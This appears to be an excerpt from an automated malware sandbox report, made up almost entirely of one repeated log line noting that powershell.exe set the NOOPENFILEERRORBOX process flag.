                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
